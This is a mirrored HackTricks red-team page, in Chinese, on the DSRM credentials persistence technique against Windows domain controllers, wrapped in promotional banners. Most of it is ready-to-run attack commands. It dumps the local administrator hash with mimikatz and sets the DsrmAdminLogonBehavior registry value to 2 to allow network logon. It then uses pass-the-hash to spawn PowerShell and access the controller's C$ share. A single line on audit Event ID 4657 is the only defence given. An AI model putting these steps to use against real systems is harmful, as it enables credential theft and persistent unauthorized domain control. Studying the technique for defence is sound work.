mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
3.9 KiB
3.9 KiB
从零到英雄学习AWS黑客技术,通过 htARTE (HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或以PDF格式下载HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
DSRM凭据
每个DC内部都有一个本地管理员账户。拥有这台机器的管理员权限后,您可以使用mimikatz来转储本地管理员的哈希值。然后,修改注册表以激活此密码,以便您可以远程访问此本地管理员用户。
首先我们需要转储DC内部本地管理员用户的哈希值:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
然后我们需要检查该账户是否有效,如果注册表键的值为“0”或不存在,你需要将其设置为“2”:
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
然后,使用PTH,您可以列出C$的内容,甚至获得一个shell。请注意,使用该哈希在内存中创建一个新的powershell会话(对于PTH),使用的"域"仅仅是DC机器的名称:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
更多信息请参见:https://adsecurity.org/?p=1714 和 https://adsecurity.org/?p=1785
缓解措施
- 事件 ID 4657 - 审计创建/更改
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您希望在 HackTricks 中看到您的公司广告或下载 HackTricks 的 PDF,请查看订阅计划!
- 获取 官方 PEASS & HackTricks 商品
- 发现 PEASS 家族,我们独家的 NFTs 收藏
- 加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。